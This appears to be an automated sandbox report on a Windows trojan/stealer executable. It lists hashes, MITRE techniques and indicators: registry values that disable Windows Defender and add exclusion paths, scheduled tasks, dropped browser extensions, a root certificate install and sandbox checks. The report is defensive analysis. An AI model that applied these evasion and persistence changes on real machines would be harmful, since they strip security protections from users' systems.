137bfe3048dfefee3d133c3659f8ae52c411454e7c84286d1a05538db5cda466

Analysis

max time kernel
129s
max time network
136s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
25-09-2022 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

c5c52a1c9ca99809a9157de4b37c2d53
SHA1

df7b0d85f6c9e4dd78545ee73678653936124c83
SHA256

137bfe3048dfefee3d133c3659f8ae52c411454e7c84286d1a05538db5cda466
SHA512

55131c66d1fbe0e84692ce542658fd174d94d6ee8dc6190d4873a73990048233c298789a51ceb1dc5be9d33ffe6f4a06a240c32ce5ffc931a219d60eb8e7e346
SSDEEP

196608:91OWqercSjNvMeNnsJdpwjBvKIQkDOhuX8qSR5:3OErcSjkhEvKINDB8qSR5

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe

Blocklisted process makes network request 6 IoCs

Processes:

rundll32.exe

flow pid process

29 796 rundll32.exe
30 796 rundll32.exe
31 796 rundll32.exe
32 796 rundll32.exe
33 796 rundll32.exe
35 796 rundll32.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exevHonfjD.exekgzJbHG.exe

pid process

828 Install.exe
668 Install.exe
972 vHonfjD.exe
1564 kgzJbHG.exe

flow	pid	process
29	796	rundll32.exe
30	796	rundll32.exe
31	796	rundll32.exe
32	796	rundll32.exe
33	796	rundll32.exe
35	796	rundll32.exe

pid	process
828	Install.exe
668	Install.exe
972	vHonfjD.exe
1564	kgzJbHG.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

kgzJbHG.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation kgzJbHG.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation	kgzJbHG.exe

Loads dropped DLL 12 IoCs

Processes:

file.exeInstall.exeInstall.exerundll32.exe

pid	process
1324	file.exe
828	Install.exe
828	Install.exe
828	Install.exe
828	Install.exe
668	Install.exe
668	Install.exe
668	Install.exe
796	rundll32.exe
796	rundll32.exe
796	rundll32.exe
796	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

kgzJbHG.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	kgzJbHG.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	kgzJbHG.exe

Drops file in System32 directory 23 IoCs

Processes:

powershell.EXEpowershell.EXEkgzJbHG.exevHonfjD.exepowershell.EXErundll32.exeInstall.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	kgzJbHG.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	kgzJbHG.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vHonfjD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	kgzJbHG.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	vHonfjD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kgzJbHG.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	kgzJbHG.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	vHonfjD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	kgzJbHG.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

Processes:

kgzJbHG.exe

description	ioc	process
File created	C:\Program Files (x86)\CXdyuXxQU\oFCnHi.dll	kgzJbHG.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kgzJbHG.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	kgzJbHG.exe
File created	C:\Program Files (x86)\CXdyuXxQU\tbUKdLM.xml	kgzJbHG.exe
File created	C:\Program Files (x86)\YnFPtusxCOTU2\WolFzCXnOHSiE.dll	kgzJbHG.exe
File created	C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\kpDfveu.dll	kgzJbHG.exe
File created	C:\Program Files (x86)\bOFQhydRtxUn\ZOsKoFx.dll	kgzJbHG.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kgzJbHG.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	kgzJbHG.exe
File created	C:\Program Files (x86)\YnFPtusxCOTU2\sKVmgdw.xml	kgzJbHG.exe
File created	C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\eXdSDkj.xml	kgzJbHG.exe
File created	C:\Program Files (x86)\LCSurMlfClMRC\bLoaRTX.dll	kgzJbHG.exe
File created	C:\Program Files (x86)\LCSurMlfClMRC\lmSWybe.xml	kgzJbHG.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\beNJzxXkYGhzSCmkZn.job	schtasks.exe
File created	C:\Windows\Tasks\GrrjjXtPjBVPFNmZQ.job	schtasks.exe
File created	C:\Windows\Tasks\ErhcMqZyPKQzNnH.job	schtasks.exe
File created	C:\Windows\Tasks\NSdDFfEujjmGqHjBl.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
832	schtasks.exe
1632	schtasks.exe
1820	schtasks.exe
948	schtasks.exe
1528	schtasks.exe
1832	schtasks.exe
736	schtasks.exe
1172	schtasks.exe
1912	schtasks.exe
2036	schtasks.exe
1092	schtasks.exe
1048	schtasks.exe
1192	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

kgzJbHG.exewscript.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	kgzJbHG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadDecision = "0"	kgzJbHG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\6a-9b-22-b4-3b-a7	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	kgzJbHG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadNetworkName = "Network"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	kgzJbHG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	kgzJbHG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	kgzJbHG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	kgzJbHG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecision = "0"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	kgzJbHG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDetectedUrl	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionReason = "1"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\WpadDecisionTime = 10156551d8d0d801	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	kgzJbHG.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7\WpadDecisionTime = 10156551d8d0d801	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\6a-9b-22-b4-3b-a7	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	kgzJbHG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5AC7D188-5E1B-45B5-8B9E-4E1BECD6D9A8}\6a-9b-22-b4-3b-a7	kgzJbHG.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kgzJbHG.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

kgzJbHG.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	kgzJbHG.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5